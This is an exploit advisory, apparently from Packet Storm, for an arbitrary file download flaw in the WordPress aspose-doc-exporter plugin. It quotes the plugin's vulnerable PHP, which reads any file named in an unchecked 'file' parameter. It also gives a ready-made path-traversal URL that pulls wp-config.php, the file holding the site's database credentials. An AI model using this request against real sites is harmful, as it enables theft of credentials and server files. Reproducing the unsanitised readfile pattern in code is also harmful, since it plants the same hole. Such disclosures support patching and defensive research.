WordPress Aspose Doc Exporter plugin suffers from an arbitrary file download vulnerability.
84dfbe2929095980e143d513dd3bd79f51a639dcb3c65727c539b46a251b7be7|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title: Wordpress aspose-doc-exporter Plugin Arbitrary
File Download Vulnerability |
| [+] Exploit Author: Ashiyane Digital Security Team |
| [+] Vendor Homepage :
https://wordpress.org/plugins/aspose-doc-exporter/developers/
| [+] Download Link :
https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
| [+] Tested on: Windows,Linux |
| [+] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit: |
| [+] Vulnerable file :
http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php
|
| [+] Vulnerable Code :
<?php
$file = $_GET['file'];
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
header("Content-Length: ".filesize($file));
readfile($file);
exit;
?>
| [+]
http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File
Address]
| [+]
| [+] Examples :
http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed